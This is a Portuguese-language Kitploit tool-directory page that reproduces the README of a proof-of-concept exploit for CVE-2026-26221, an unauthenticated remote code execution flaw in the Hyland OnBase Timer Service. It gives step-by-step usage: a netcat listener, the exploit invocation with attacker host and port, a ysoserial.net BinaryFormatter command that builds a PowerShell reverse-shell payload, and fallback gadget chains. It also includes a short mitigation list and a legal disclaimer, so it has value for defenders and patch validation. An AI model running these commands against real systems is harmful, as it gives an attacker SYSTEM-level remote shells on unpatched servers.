Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-26221-Hyland-OnBase-Timer-Service-Unauthenticated-RCE — Prova de conceito de exploit para execução remota de código não autenticada no Hyland OnBase Timer Service por meio de desserialização BinaryFormatter do .NET Remoting, alcançando privilégios de SYSTEM. | Kitploit
Ferramentas/GitHubGitHub/mbanyamer/cve-2026-26221-hyland-onbase-timer-service-unauthenticated-rce
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubmbanyamer/cve-2026-26221-hyland-onbase-timer-service-unauthenticated-rce

CVE-2026-26221-Hyland-OnBase-Timer-Service-Unauthenticated-RCE

Prova de conceito de exploit para execução remota de código não autenticada no Hyland OnBase Timer Service por meio de desserialização BinaryFormatter do .NET Remoting, alcançando privilégios de SYSTEM.

Ver Repositório
há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

📡 Hyland OnBase Timer Service RCE Não Autenticado

Mohammed Idrees Banyamer

Pesquisador de Segurança

Jordânia 🇯🇴

Author Role Country Platform Vulnerability CVE CVSS Status


🧨 Visão Geral

Este repositório contém um exploit de Prova‑de‑Conceito para a vulnerabilidade de execução remota de código não autenticada no Hyland OnBase Timer Service via desserialização insegura de .NET Remoting BinaryFormatter.

A vulnerabilidade permite que um atacante não autenticado envie um payload BinaryFormatter malicioso para o endpoint do Timer Service e execute código arbitrário como NT AUTHORITY\SYSTEM.

  • Produto: Hyland OnBase Workflow / Workview Timer Service
  • Porta: 8900/TCP
  • Autenticação: Não necessária
  • Impacto: Execução Remota de Código
  • Privilégios: SYSTEM
  • CVE: CVE‑2026‑26221
  • CVSS: 9.8 (Crítico)

⚙️ Detalhes Técnicos

O Timer Service expõe um endpoint .NET Remoting:

root@kitploit:~
http://TARGET:8900/TimerServiceAPI.rem

O serviço aceita objetos BinaryFormatter não autenticados. Ao fornecer uma cadeia de gadgets maliciosa (ysoserial.net), a execução arbitrária de comandos ocorre durante a desserialização.


📦 Requisitos

  • Python 3
  • requests
  • ysoserial.net
  • Listener netcat
  • Ambiente de geração de payload Windows (Windows / Mono / Wine)

Instale a dependência Python:

root@kitploit:~
pip install requests

Baixe o ysoserial.net:

root@kitploit:~
git clone https://github.com/pwntester/ysoserial.net

🚀 Uso

1️⃣ Iniciar Listener

root@kitploit:~
nc -lvnp 4444

2️⃣ Executar Exploit

root@kitploit:~
python3 exploit.py 192.168.10.50 --lhost 192.168.1.100 --lport 4444

3️⃣ Gerar Payload

O script imprime um comando ysoserial. Execute-o em outro terminal (Windows / Mono):

root@kitploit:~
ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -c "powershell ..." -o raw > rev_shell.bin

4️⃣ Enviar Payload

Pressione ENTER no terminal do exploit após a geração do payload.

Se vulnerável → a reverse shell conecta.


🧪 Exemplo

root@kitploit:~
python3 exploit.py 10.10.10.123 --lhost 192.168.5.77 --lport 9001

🔧 Opções

OpçãoDescrição
targetIP ou hostname do alvo
--portPorta do Timer Service (padrão 8900)
--endpointTimerServiceAPI.rem / TimerServiceEvents.rem
--lhostIP do atacante
--lportPorta do listener
--gadgetCadeia de gadgets ysoserial

🧯 Notas

  • O exploit é cego

  • Sucesso = callback de reverse shell

  • O serviço executa como SYSTEM

  • Tente gadget alternativo se bloqueado:

    • TextFormattingRunProperties
    • ObjectDataProvider

🛡️ Mitigação

  • Aplique os patches do advisory de segurança OB2025‑03 da Hyland
  • Desative a exposição do .NET Remoting
  • Restrinja o acesso à porta 8900
  • Monitore o uso do BinaryFormatter

📊 Fluxo de Ataque do PoC

root@kitploit:~
sequenceDiagram
    participant A as Atacante
    participant Y as ysoserial.net
    participant T as Alvo OnBase Timer Service
    participant S as Shell SYSTEM

    A->>A: Iniciar listener netcat
    A->>Y: Gerar payload BinaryFormatter
    Y-->>A: rev_shell.bin
    A->>T: HTTP POST /TimerServiceAPI.rem
    T->>T: BinaryFormatter.Deserialize()
    T->>S: Executar cadeia de gadgets
    S-->>A: Conexão reverse shell

⚠️ Aviso Legal

Este exploit é fornecido para:

  • Pesquisa de segurança
  • Testes de penetração autorizados
  • Validação defensiva

O uso não autorizado contra sistemas que você não possui ou não tem permissão para testar é ilegal.


Baixar ferramenta